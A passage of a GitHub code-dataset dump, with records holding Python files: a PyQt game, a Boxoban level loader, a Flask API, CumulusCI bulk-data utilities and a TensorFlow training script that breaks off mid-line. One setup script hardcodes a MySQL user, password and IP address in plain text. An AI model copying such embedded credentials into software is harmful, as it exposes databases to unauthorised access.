create_file(filename,batch,cha,hei,wei,traSam,testSam,out,leaRat,mom,leaDec):\r\n file=open(filename,\"w+\")\r\n global lastlayer\r\n lastlayer=0\r\n firstVal(file,batch,cha,hei,wei,traSam,testSam,out,leaRat,mom,leaDec)\r\n createNN(file,out)\r\n file.close()\r\n \r\nfilename = \"resnet18.ini\"\r\n## filename,batchSize,inputChanal,inputHeigth,inputWeigth,trainingSample,\r\n#testSample,outChanal,learningRate,momentum,learningDecay\r\ncreate_file(filename,1000,3,32,32,50000,10000,10,0.01,0.95,0.0)\r\nos.system(\"AkaCudnNet.exe \"+filename)\r\n","repo_name":"mdAhmetKemal/AkaCudnNet","sub_path":"tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20353138156","text":"\"\"\"A simple example for a few types and keywords\"\"\"\n\nfrom math import pi, floor\n\nCONST = 4\nstr_ = \"abcde\"\n\n# calculate output\noutput = str_ * CONST + str(2) * floor(pi)\n\n# Fira Code tests:\n# r 0 @ & * == === != !==\n\nprint(output)\n","repo_name":"zandivx/protokoll_template","sub_path":"template.latex/input/python_example.py","file_name":"python_example.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18089936249","text":"# importing libraries \nimport sys \n\nfrom PyQt5.QtWidgets import * \nfrom PyQt5.QtGui import * \nfrom PyQt5.QtCore import * \n\nfrom Room import Room\nimport LivingRoom\nfrom Bedroom import Bedroom\nfrom Bathroom import Bathroom \nimport config\n\nclass Hallway(Room):\n \"\"\"\n Bedroom window to pop up when player navigates to the Bedroom Location\n \"\"\"\n def __init__(self):\n super().__init__(\"Hallway\")\n\n self.setRoomButtons()\n self.setInteractionButtons()\n self.setEasterEggButtons()\n\n def setRoomButtons(self):\n # Setting up buttons and other room windows\n self.lr = None\n self.livingButton = QPushButton(\"Living Room\", self)\n self.livingButton.setGeometry(self.width/2-self.button_width/2,self.image_height-self.button_height,self.button_width,self.button_height)\n self.livingButton.clicked.connect(self.toLiving)\n\n self.br = None\n self.bedroomButton = QPushButton(\"Bedroom\", self)\n self.bedroomButton.setGeometry(self.width-self.button_width,self.image_height/2-self.button_height/2,self.button_width,self.button_height)\n self.bedroomButton.clicked.connect(self.toBedroom)\n\n self.bh = None\n self.bathroomButton = QPushButton(\"Bathroom\", self)\n self.bathroomButton.setGeometry(self.left,self.image_height/2-self.button_height/2,self.button_width,self.button_height)\n self.bathroomButton.clicked.connect(self.toBathroom)\n\n def setInteractionButtons(self):\n bw = 25\n bh = 25\n\n def setEasterEggButtons(self):\n # Setting up easter egg buttons\n pass\n\n def toLiving(self, checked):\n config.progress.rooms_visited += 1\n if self.lr is None:\n self.lr = LivingRoom.LivingRoom()\n self.lr.show()\n else:\n self.lr.close() # Close window.\n self.lr = None # Discard reference.\n self.close()\n\n def toBedroom(self, checked):\n config.progress.rooms_visited += 1\n if self.br is None:\n self.br = Bedroom()\n self.br.show()\n else:\n self.br.close() # Close window.\n self.br = None # Discard reference.\n\n self.close()\n\n def toBathroom(self, checked):\n config.progress.rooms_visited += 1\n if self.bh is None:\n self.bh = Bathroom()\n self.bh.show()\n else:\n self.bh.close() # Close window.\n self.bh = None # Discard reference.\n","repo_name":"HagenFritz/nancy-drew-forced-quarantine","sub_path":"src/Hallway.py","file_name":"Hallway.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72379346667","text":"import glob\nimport os\nimport zipfile\n\nimport numpy as np\nimport requests\n\nBOXOBAN_URL = \"https://github.com/deepmind/boxoban-levels/archive/master.zip\"\n\n\ndef boxoban_level_generator(levels_set=\"unfiltered\", data_split=\"valid\"):\n env = Boxoban(levels_set=levels_set, data_split=data_split)\n while True:\n index = np.random.randint(0, env.num_levels-1)\n yield env.levels[index]\n\n\nclass Boxoban(object):\n \"\"\"Class for loading and generatting Boxoban levels.\"\"\"\n\n def __init__(self,\n levels_set=\"unfiltered\",\n data_split=\"valid\"):\n self._levels_set = levels_set\n self._data_split = data_split\n self._levels = []\n\n data_file_path_local = os.path.join(os.path.dirname(__file__),\n \"boxoban_cache\",\n \"{}_{}.npz\".format(self._levels_set,\n self._data_split))\n\n data_file_path_global = os.path.join(\"/tmp/boxoban_cache\",\n \"{}_{}.npz\".format(self._levels_set,\n self._data_split))\n\n if os.path.exists(data_file_path_local):\n self.levels = np.load(data_file_path_local)[\"levels\"]\n elif os.path.exists(data_file_path_global):\n self.levels = np.load(data_file_path_global)[\"levels\"]\n else:\n self.levels = self.get_data()\n self.num_levels = len(self.levels)\n\n def get_data(self):\n \"\"\"Downloads and cache the data.\"\"\"\n try:\n cache_path = os.path.join(\n os.path.dirname(__file__), \"boxoban_cache\")\n os.makedirs(cache_path, exist_ok=True)\n except PermissionError:\n cache_path = os.path.join(\"/tmp/boxoban_cache\")\n if not os.path.exists(cache_path):\n os.makedirs(cache_path, exist_ok=True)\n\n # Get the zip file\n zip_file_path = os.path.join(cache_path, \"master.zip\")\n if not os.path.exists(zip_file_path):\n response = requests.get(BOXOBAN_URL, stream=True)\n handle = open(zip_file_path, \"wb\")\n for chunk in response.iter_content(chunk_size=512):\n if chunk:\n handle.write(chunk)\n handle.close()\n\n with zipfile.ZipFile(zip_file_path, \"r\") as zipref:\n zipref.extractall(cache_path)\n\n # convert to npz\n path = os.path.join(cache_path, \"boxoban-levels-master\",\n self._levels_set,\n self._data_split)\n files = glob.glob(path + \"/*.txt\")\n levels = \"\".join([open(f, \"r\").read() for f in files])\n levels = levels.split(\"\\n;\")\n levels = [\"\\n\".join(item.split(\"\\n\")[1:]) for item in levels]\n levels = np.asarray(levels)\n data_file_path = os.path.join(\n cache_path, \"{}_{}.npz\".format(self._levels_set, self._data_split))\n np.savez(data_file_path, levels=levels)\n return levels\n","repo_name":"deepmind/deepmind-research","sub_path":"physics_planning_games/mujoban/boxoban.py","file_name":"boxoban.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"32795356401","text":"import os\nimport pymysql.cursors\nimport PySimpleGUI as sg\nimport ipget\n\n\nlayout1 = [\n [sg.Text('データベースIPアドレス入力画面')],\n [sg.Text('データベースのIPアドレス', size=(22,1)), sg.InputText('172.30.8.14')],\n [sg.Submit(button_text='接続')]]\n\nroomlist=[]\ncameralist=[\"0\",\"1\",\"2\"]\nlayout2 = [\n [sg.Text('COCOVision-Config')],\n [sg.Text('部屋名', size=(15, 1)),sg.Combo((roomlist),readonly=True,default_value=\"部屋一覧\",size=(20, 1))],\n [sg.Text('カメラ接続個数', size=(15, 1)),sg.Combo((cameralist),readonly=True,default_value=\"0\",size=(20, 1))],\n [sg.Submit(button_text='適用')]]\n\n\ndef showWin1():\n win1 = sg.Window('COCOVision-Config', layout1)\n while True:\n event, values = win1.read()\n if event is None: break\n if event == '接続':\n try:\n connection = pymysql.connect(host=values[0],\n user='recorder',\n password='th1117',\n db='cocovision',\n charset='utf8')\n sg.popup('接続しました')\n win1.close()\n return connection,values[0]\n except Exception as e:\n sg.popup('接続に失敗しました:'+str(e))\n\ndef showWin2(connection,dbip):\n try:#get to room list\n cursor = connection.cursor()\n cursor.execute(\"select room_name from room_info;\")\n result=cursor.fetchall()\n for row in result:\n roomlist.append(str(row[0]))\n except:\n sg.popup('接続できませんでした、もう一度入力してください')\n \n win2 = sg.Window('COCOVision-Config', layout2)\n while True:\n event, values = win2.read()\n if event is None: break\n if event == '適用':\n if values[0]==\"部屋一覧\":\n sg.popup('部屋を選択してください')\n else:\n setupCnf(values,dbip,cursor)\n setupDb(connection,values)\n win2.close()\n\ndef setupCnf(values,dbip,cursor):\n path = os.getcwd()\n room_name=values[0]\n camera=values[1]\n with open(path+\"/config/COCOVision.config\", \"w\") as f:\n f.write(room_name+\"\\n\"+str(camera)+\"\\n\"+dbip)\n\n\ndef setupDb(connection,values):\n try: #mysqlデータベースに接続\n cursor=connection.cursor()\n ip = str(ipget.ipget().ipaddr(\"wlan0\")).split('/')\n sql = '''update room_info set device_ip_address=%(ip)s,num_camera=%(camera)s where room_name=%(room)s;'''\n into ={'ip':ip[0],'camera':values[1],'room':values[0]}\n cursor.execute(sql,into)\n connection.commit()\n cursor.close()\n sg.popup('適用しました')\n except: #接続できなかったらエラー文\n print(\"データベースへの登録に失敗しました\")\n sg.popup('データベースへの登録に失敗しました')\n\n\n\n#start task\nreWin1=showWin1()\nshowWin2(reWin1[0],reWin1[1])\n","repo_name":"REM-Project/COCOVision","sub_path":"recorder/cocovision/COCOVision-setup.py","file_name":"COCOVision-setup.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14548389754","text":"import datetime\nimport itertools\n\nfrom sqlalchemy import types\nfrom sqlalchemy import event\nfrom sqlalchemy import Column\nfrom sqlalchemy import Integer\nfrom sqlalchemy import Table\nfrom sqlalchemy import Unicode\nfrom sqlalchemy.orm import mapper\n\nfrom cumulusci.core.exceptions import BulkDataException\nfrom cumulusci.utils import convert_to_snake_case\n\n\ndef batch_iterator(iterator, n=10000):\n while True:\n batch = list(itertools.islice(iterator, n))\n if not batch:\n return\n\n yield batch\n\n\ndef get_lookup_key_field(lookup, sf_field):\n return lookup.get(\"key_field\") or convert_to_snake_case(sf_field)\n\n\n# Create a custom sqlalchemy field type for sqlite datetime fields which are stored as integer of epoch time\nclass EpochType(types.TypeDecorator):\n impl = types.Integer\n\n epoch = datetime.datetime(1970, 1, 1, 0, 0, 0)\n\n def process_bind_param(self, value, dialect):\n return int((value - self.epoch).total_seconds()) * 1000\n\n def process_result_value(self, value, dialect):\n if value is not None:\n return self.epoch + datetime.timedelta(seconds=value / 1000)\n\n\n# Listen for sqlalchemy column_reflect event and map datetime fields to EpochType\n@event.listens_for(Table, \"column_reflect\")\ndef setup_epoch(inspector, table, column_info):\n if isinstance(column_info[\"type\"], types.DateTime):\n column_info[\"type\"] = EpochType()\n\n\nclass SqlAlchemyMixin:\n def _sql_bulk_insert_from_records(\n self, *, connection, table, columns, record_iterable\n ):\n \"\"\"Persist records from the given generator into the local database.\"\"\"\n table = self.metadata.tables[table]\n\n connection.execute(\n table.insert(), [dict(zip(columns, row)) for row in record_iterable]\n )\n\n self.session.flush()\n\n def _create_record_type_table(self, table_name):\n \"\"\"Create a table to store mapping between Record Type Ids and Developer Names.\"\"\"\n rt_map_model_name = f\"{table_name}Model\"\n self.models[table_name] = type(rt_map_model_name, (object,), {})\n rt_map_fields = [\n Column(\"record_type_id\", Unicode(18), primary_key=True),\n Column(\"developer_name\", Unicode(255)),\n ]\n rt_map_table = Table(table_name, self.metadata, *rt_map_fields)\n mapper(self.models[table_name], rt_map_table)\n\n def _extract_record_types(self, sobject, table, conn):\n \"\"\"Query for Record Type information and persist it in the database.\"\"\"\n self.logger.info(f\"Extracting Record Types for {sobject}\")\n query = (\n f\"SELECT Id, DeveloperName FROM RecordType WHERE SObjectType='{sobject}'\"\n )\n\n result = self.sf.query(query)\n\n if result[\"totalSize\"]:\n self._sql_bulk_insert_from_records(\n connection=conn,\n table=table,\n columns=[\"record_type_id\", \"developer_name\"],\n record_iterable=(\n [rt[\"Id\"], rt[\"DeveloperName\"]] for rt in result[\"records\"]\n ),\n )\n\n\ndef _handle_primary_key(mapping, fields):\n \"\"\"Provide support for legacy mappings which used the OID as the pk but\n default to using an autoincrementing int pk and a separate sf_id column\"\"\"\n\n mapping[\"oid_as_pk\"] = bool(mapping.get(\"fields\", {}).get(\"Id\"))\n if mapping[\"oid_as_pk\"]:\n id_column = mapping[\"fields\"][\"Id\"]\n fields.append(Column(id_column, Unicode(255), primary_key=True))\n else:\n fields.append(Column(\"id\", Integer(), primary_key=True, autoincrement=True))\n\n\ndef create_table(mapping, metadata):\n \"\"\"Given a mapping data structure (from mapping.yml) and SQLAlchemy\n metadata, create a table matching the mapping.\n\n Mapping should be a dict-like with keys \"fields\", \"table\" and\n optionally \"oid_as_pk\" and \"record_type\" \"\"\"\n\n fields = []\n _handle_primary_key(mapping, fields)\n\n # make a field list to create\n for field in fields_for_mapping(mapping):\n if mapping[\"oid_as_pk\"] and field[\"sf\"] == \"Id\":\n continue\n fields.append(Column(field[\"db\"], Unicode(255)))\n\n if \"record_type\" in mapping:\n fields.append(Column(\"record_type\", Unicode(255)))\n t = Table(mapping[\"table\"], metadata, *fields)\n if t.exists():\n raise BulkDataException(f\"Table already exists: {mapping['table']}\")\n return t\n\n\ndef fields_for_mapping(mapping):\n \"\"\"Summarize the list of fields in a table mapping\"\"\"\n fields = []\n for sf_field, db_field in mapping.get(\"fields\", {}).items():\n fields.append({\"sf\": sf_field, \"db\": db_field})\n for sf_field, lookup in mapping.get(\"lookups\", {}).items():\n fields.append({\"sf\": sf_field, \"db\": get_lookup_key_field(lookup, sf_field)})\n return fields\n\n\ndef generate_batches(num_records, batch_size):\n \"\"\"Generate batch size list for splitting a number of tasks into batch jobs.\n\n Given a number of records to split up, and a batch size, generate a\n stream of batchsize, index pairs\"\"\"\n num_batches = (num_records // batch_size) + 1\n for i in range(0, num_batches):\n if i == num_batches - 1: # last batch\n batch_size = num_records - (batch_size * i) # leftovers\n if batch_size > 0:\n yield batch_size, i\n\n\nclass RowErrorChecker:\n def __init__(self, logger, ignore_row_errors, row_warning_limit):\n self.logger = logger\n self.ignore_row_errors = ignore_row_errors\n self.row_warning_limit = row_warning_limit\n self.row_error_count = 0\n\n def check_for_row_error(self, result, row_id):\n if not result.success:\n msg = f\"Error on record with id {row_id}: {result.error}\"\n if self.ignore_row_errors:\n if self.row_error_count < self.row_warning_limit:\n self.logger.warning(msg)\n elif self.row_error_count == self.row_warning_limit:\n self.logger.warning(\"Further warnings suppressed\")\n self.row_error_count += 1\n return self.row_error_count\n else:\n raise BulkDataException(msg)\n","repo_name":"justindixon/CumulusCI","sub_path":"cumulusci/tasks/bulkdata/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"41512231523","text":"#!/usr/bin/env python\nfrom __future__ import (absolute_import, division,\n print_function)\n\nimport click\nimport sys\n\nfrom .ops import dumps, loads\n\n\n@click.command()\n@click.argument(\n 'file',\n type=click.Path(\n file_okay=True,\n dir_okay=False,\n ),\n required=True,\n nargs=-1,\n)\n@click.option(\n '--overwrite', '-o',\n is_flag=True,\n help=\"Whether to overwrite files, or print to stdout\",\n)\n@click.option(\n '--indent',\n default=2,\n help='Number of spaces to indent',\n)\ndef cli(file, overwrite, indent):\n \"\"\"\n Prettifies a JSON file, or files, or stdin, by indenting and sorting.\n\n In lieu of filenames, '-' may be used to represent stdin.\n \"\"\"\n if file == ('-',):\n prettify(sys.stdin, False, indent)\n else:\n for path in file:\n mode = 'r+' if overwrite else 'r'\n fobj = open(path, mode)\n prettify(fobj, overwrite, indent)\n\n\ndef prettify(fobj, overwrite, indent):\n in_str = fobj.read()\n jobj = loads(in_str)\n if not overwrite:\n sys.stderr.write(\"// {}:\\n\".format(fobj.name))\n new_str = dumps(jobj, indent=indent).strip() + '\\n'\n if (fobj is sys.stdin) or (overwrite is False):\n sys.stdout.write(new_str)\n sys.stdout.flush()\n else:\n fobj.seek(0)\n fobj.truncate()\n fobj.write(new_str)\n","repo_name":"zmc/json_pretty","sub_path":"json_pretty/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12457097605","text":"from pathlib import Path\n\nimport yaml\nfrom easydict import EasyDict as edict\n\n\ndef Config(filename):\n listfile1 = open(filename, 'r')\n listfile2 = open(filename, 'r')\n cfg = edict(yaml.safe_load(listfile1))\n # settings_show = listfile2.read().splitlines()\n\n listfile1.close()\n listfile2.close()\n\n return cfg","repo_name":"wangxiyang2022/YONTD-MOT","sub_path":"mot/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"42942068680","text":"import logging\nfrom operator import index\nimport yaml\nimport json\nimport os\n\n\ndef read_yaml(path_of_yaml: str) -> dict:\n with open(path_of_yaml) as yaml_file:\n content = yaml.safe_load(yaml_file)\n logging.info(\"yaml files: {path_of_yaml} successfully loaded\")\n return content\n\ndef create_directory(dirs: list):\n for dir_path in dirs:\n os.makedirs(dir_path,exist_ok =True)\n logging.info(f\"reports are saved at {dir_path}\")\n\n\ndef save_local_df(data,data_path, index_status = False):\n data.to_csv(data_path,index = index_status)\n logging.info(f\"reports are saved at {data_path}\")\n\ndef save_reports(reports: dict(),report_path: str,indentation =4):\n with open (report_path ,'w') as f:\n json.dump(reports,f,indent = indentation)\n logging.info(f\"reports are saved at {report_path}\")","repo_name":"mdsaifk/dvc_dL","sub_path":"src/utils/all_utils.py","file_name":"all_utils.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21048460115","text":"from .malware import MalwareFolder\nfrom .utils import BinaryLoader\n\nfrom typing import Callable, Optional, Tuple\n\n\nclass RawPE(MalwareFolder):\n def __init__(\n self,\n root: str,\n extensions: Optional[Tuple[str, ...]] = None,\n transform: Optional[Callable] = None, \n target_transform: Optional[Callable] = None, \n transforms: Optional[Callable] = None,\n is_valid_file: Optional[Callable[[str], bool]] = None,\n ) -> None:\n if extensions is None and is_valid_file is None:\n extensions = (\".exe\", \".dll\")\n super().__init__(\n root,\n BinaryLoader(),\n extensions=extensions,\n transform=transform,\n target_transform=target_transform,\n transforms=transforms,\n is_valid_file=is_valid_file,\n )\n\n","repo_name":"Dovermore/randomized-deletion","sub_path":"src/torchmalware/datasets/raw_pe.py","file_name":"raw_pe.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23044582531","text":"# 填写普通参数 不要填写密码等敏感信息\n# 国网电力官网\nLOGIN_URL = \"https://www.95598.cn/osgweb/login\"\nELECTRIC_USAGE_URL = \"https://www.95598.cn/osgweb/electricityCharge\"\nBALANCE_URL = \"https://www.95598.cn/osgweb/userAcc\"\n\n\n# Home Assistant\nSUPERVISOR_URL = \"http://supervisor/core\"\nAPI_PATH = \"/api/states/\" # https://developers.home-assistant.io/docs/api/rest/\n\nBALANCE_SENSOR_NAME = \"sensor.electricity_charge_balance\"\nDAILY_USAGE_SENSOR_NAME = \"sensor.last_electricity_usage\"\nYEARLY_USAGE_SENSOR_NAME = \"sensor.yearly_electricity_usage\"\nYEARLY_CHARGE_SENESOR_NAME = \"sensor.yearly_electricity_charge\"\nBALANCE_UNIT = \"CNY\"\nUSAGE_UNIT = \"kWh\"\n\n","repo_name":"Bpazy/sgcc_electricity","sub_path":"scripts/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22284318591","text":"from dags.dbo.oracle_market_data_model import AIndexDescription\nfrom dags.dbo.oracle_market_data_model import Oracle_Session\nfrom terminal import Logging\n\nlogger = Logging.getLogger(__name__)\n\n\nclass OracleAIndexDescriptionRepo:\n\n @staticmethod\n def get_all_a_index_description():\n \"\"\"\n 全量查询\n :return:\n \"\"\"\n logger.info('开始从a_index_description表获取数据')\n oracle_session = Oracle_Session()\n a_index_descriptions = oracle_session.query(AIndexDescription).all()\n oracle_session.close()\n\n if len(a_index_descriptions) == 0 or a_index_descriptions is None:\n logger.info('从a_index_description表没有获取到数据')\n return []\n\n logger.info('在a_index_description表查询到了%d条数据' %\n (len(a_index_descriptions)))\n\n return a_index_descriptions\n\n","repo_name":"zhanrendong/jkzx1","sub_path":"scripts/airflow/dags/dao/oracle_a_index_description_repo.py","file_name":"oracle_a_index_description_repo.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24303090958","text":"from flask import Flask, jsonify\n\napp = Flask(__name__)\n\nmovies = [\n\t{\"id\": 1, \"name\": \"Phantom Menace\"},\n\t{\"id\": 2, \"name\": \"Attack of the Clones\"},\n\t{\"id\": 3, \"name\": \"Revenge of the Sith\"}\n]\n\n@app.route('/movies/', methods=[\"GET\"])\ndef get_movie(id):\n\tfor movie in movies:\n\t\tif movie[\"id\"] == id:\n\t\t\treturn jsonify(movie), 200\n\treturn jsonify({\"message\": \"Not Found\"}), 404\n\n@app.route('/movies', methods=[\"GET\"])\ndef get_movies():\n\treturn jsonify(movies), 200\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='0.0.0.0', port=5000)\n","repo_name":"Yo-mah-Ya/kubernetes","sub_path":"nginx-flask/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14859084691","text":"from sbxmap import *\r\nimport tifffile as tif\r\nimport os\r\n\r\ndef averageFrames(directory,file,channel,plane):\r\n\tanimal_dir = directory\r\n\tos.chdir(animal_dir)\r\n\r\n\td_sbx = sbxmap(file)\r\n\r\n\tplane = d_sbx.data()[channel][plane]\r\n\r\n\tframes = np.floor(plane.shape[0]/10)\r\n\tplane = plane[:(frames*10)]\r\n\toutput = plane.reshape(frames,10,plane.shape[1],plane.shape[2]).mean(axis=1)\r\n\ttif.imsave('averaged_python.tif',output)\r\n\twith open('averaged_python.sbx', 'w') as f:\r\n\t\tnp.save(f, output, allow_pickle=False)\r\n\r\n","repo_name":"jzeitoun/scanbox-analysis","sub_path":"python/averageFrames.py","file_name":"averageFrames.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20430252389","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datetime import datetime\nimport os.path\nimport os\nimport time\nimport sys\nimport random\nimport tensorflow as tf\nimport numpy as np\nimport importlib\nimport argparse\nimport framework\nimport lfw\nimport h5py\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.python.ops import data_flow_ops\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allocator_type = 'BFC'\n\ndef main(args):\n\tnetwork = importlib.import_module(args.model_def)\n\tsubdir = datetime.strftime(datetime.now(), '%Y%m%d-%H%M%S')\n\tlog_dir = os.path.join(os.path.expanduser(args.logs_base_dir), subdir)\n\tif not os.path.isdir(log_dir): # Create the log directory if it doesn't exist\n\t\tos.makedirs(log_dir)\n\tmodel_dir = os.path.join(os.path.expanduser(args.models_base_dir), subdir)\n\tif not os.path.isdir(model_dir): # Create the model directory if it doesn't exist\n\t\tos.makedirs(model_dir)\n\t\t\n\tnp.random.seed(seed=args.seed)\n\trandom.seed(args.seed)\n\ttrain_set = framework.get_dataset(args.data_dir)\n\tnrof_classes = len(train_set)\n\tprint('Model directory: %s' % model_dir)\n\tprint('Log directory: %s' % log_dir)\n \n\tpretrained_model = None\n\tif args.pretrained_model:\n\t\tpretrained_model = os.path.expanduser(args.pretrained_model)\n\t\tprint('Pre-trained model: %s' % pretrained_model)\n\n\twith tf.Graph().as_default():\n\t\ttf.set_random_seed(args.seed)\n\t\tglobal_step = tf.Variable(0, trainable=False)\n \n # Get a list of image paths and their labels\n\t\timage_list, label_list = framework.get_image_paths_and_labels(train_set)\n\t\tassert len(image_list)>0, 'The dataset should not be empty'\n \n # Create a queue that produces indices into the image_list and label_list \n\t\tlabels = ops.convert_to_tensor(label_list, dtype=tf.int32)\n\t\trange_size = array_ops.shape(labels)[0]\n\t\tindex_queue = tf.train.range_input_producer(range_size, num_epochs=None,\n shuffle=True, seed=None, capacity=32)\n \n\t\tindex_dequeue_op = index_queue.dequeue_many(args.batch_size*args.epoch_size, 'index_dequeue')\n \n\t\tlearning_rate_placeholder = tf.placeholder(tf.float32, name='learning_rate')\n\n\t\tbatch_size_placeholder = tf.placeholder(tf.int32, name='batch_size')\n \n\t\tphase_train_placeholder = tf.placeholder(tf.bool, name='phase_train')\n \n\t\timage_paths_placeholder = tf.placeholder(tf.string, shape=(None,1), name='image_paths')\n\n\t\tlabels_placeholder = tf.placeholder(tf.int64, shape=(None,1), name='labels')\n \n\t\tinput_queue = data_flow_ops.FIFOQueue(capacity=100000,\n dtypes=[tf.string, tf.int64],\n shapes=[(1,), (1,)],\n shared_name=None, name=None)\n\t\tenqueue_op = input_queue.enqueue_many([image_paths_placeholder, labels_placeholder], name='enqueue_op')\n\n\t\tnrof_preprocess_threads = 4\n\t\timages_and_labels = []\n\t\tfor _ in range(nrof_preprocess_threads):\n\t\t\tfilenames, label = input_queue.dequeue()\n\t\t\timages = []\n\t\t\tfor filename in tf.unstack(filenames):\n\t\t\t\tfile_contents = tf.read_file(filename)\n\t\t\t\timage = tf.image.decode_image(file_contents,channels=3)\n\t\t\t\tif args.random_rotate:\n\t\t\t\t\timage = tf.py_func(framework.random_rotate_image, [image], tf.uint8)\n\t\t\t\tif args.random_crop:\n\t\t\t\t\timage = tf.random_crop(image, [args.image_size, args.image_size, 3])\n\t\t\t\telse:\n\t\t\t\t\timage = tf.image.resize_image_with_crop_or_pad(image, args.image_size, args.image_size)\n\t\t\t\tif args.random_flip:\n\t\t\t\t\timage = tf.image.random_flip_left_right(image)\n \n #pylint: disable=no-member\n\t\t\t\timage.set_shape((args.image_size, args.image_size, 3))\n\t\t\t\timages.append(tf.image.per_image_standardization(image))\n\t\t\timages_and_labels.append([images, label])\n\n\t\timage_batch, label_batch = tf.train.batch_join(\n\t\t\timages_and_labels, batch_size=batch_size_placeholder, \n\t\t\tshapes=[(args.image_size, args.image_size, 3), ()], enqueue_many=True,\n\t\t\tcapacity=4 * nrof_preprocess_threads * args.batch_size,\n\t\t\tallow_smaller_final_batch=True)\n\t\timage_batch = tf.reshape(image_batch,[args.batch_size,100,100,3])\n\t\timage_batch = tf.identity(image_batch, 'image_batch')\n\t\timage_batch = tf.identity(image_batch, 'input')\n\t\tlabel_batch = tf.identity(label_batch, 'label_batch')\n\t\tprint('Total number of classes: %d' % nrof_classes)\n\t\tprint('Total number of examples: %d' % len(image_list))\n\t\tprint('Building training graph')\n\t\tprelogits = network.inference(image_batch, args.keep_probability, \n\t\t\tphase_train=phase_train_placeholder, bottleneck_layer_size=args.embedding_size, \n\t\t\tweight_decay=args.weight_decay, batch_size=args.batch_size)\n\t\tlogits = slim.fully_connected(prelogits, len(train_set), activation_fn=None, \n weights_initializer=tf.truncated_normal_initializer(stddev=0.1), \n weights_regularizer=slim.l2_regularizer(args.weight_decay),\n scope='Logits', reuse=False)\n\t\tprint(logits.name)\n\t\tembeddings = tf.nn.l2_normalize(prelogits, 1, 1e-10, name='embeddings')\n\n # Add center loss\n\t\tif args.center_loss_factor>0.0:\n\t\t\tprelogits_center_loss, _ = framework.center_loss(prelogits, label_batch, args.center_loss_alfa, nrof_classes)\n\t\t\ttf.add_to_collection(tf.GraphKeys.REGULARIZATION_LOSSES, prelogits_center_loss * args.center_loss_factor)\n\n\t\tlearning_rate = tf.train.exponential_decay(learning_rate_placeholder, global_step,\n\t\t\targs.learning_rate_decay_epochs*args.epoch_size, args.learning_rate_decay_factor, staircase=True)\n\t\ttf.summary.scalar('learning_rate', learning_rate)\n\n # Calculate the average cross entropy loss across the batch\n\t\tcross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n\t\t\tlabels=label_batch, logits=logits, name='cross_entropy_per_example')\n\t\tcross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n\t\ttf.add_to_collection('losses', cross_entropy_mean)\n \n\n # Calculate the total losses\n\t\tregularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n\t\ttotal_loss = tf.add_n([cross_entropy_mean] + regularization_losses, name='total_loss')\n\n # Build a Graph that trains the model with one batch of examples and updates the model parameters\n\t\ttrain_op, redun = framework.trainspd(total_loss, global_step, args.optimizer, \n\t\t\tlearning_rate, args.moving_average_decay, tf.global_variables(), args.log_histograms)\n \n # Create a saver\n\t\tsaver = tf.train.Saver(tf.trainable_variables(), max_to_keep=3)\n\n # Build the summary operation based on the TF collection of Summaries.\n\t\tsummary_op = tf.summary.merge_all()\n\n # Start running operations on the Graph.\n\t\t#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)\n\t\tgpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)\n\t\tsess=tf.Session(config=config)\n\t\t#sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))\n\t\tsess.run(tf.global_variables_initializer())\n\t\tsess.run(tf.local_variables_initializer())\n\t\tsummary_writer = tf.summary.FileWriter(log_dir, sess.graph)\n\t\tcoord = tf.train.Coordinator()\n\t\ttf.train.start_queue_runners(coord=coord, sess=sess)\n\n\t\twith sess.as_default():\n\n\t\t\tif pretrained_model:\n\t\t\t\tprint('Restoring pretrained model: %s' % pretrained_model)\n\t\t\t\tsaver.restore(sess, pretrained_model)\n\n # Training and validation loop\n\t\t\tprint('Running training')\n\t\t\tepoch = 0\n\t\t\twhile epoch < args.max_nrof_epochs:\n\t\t\t\tstep = sess.run(global_step, 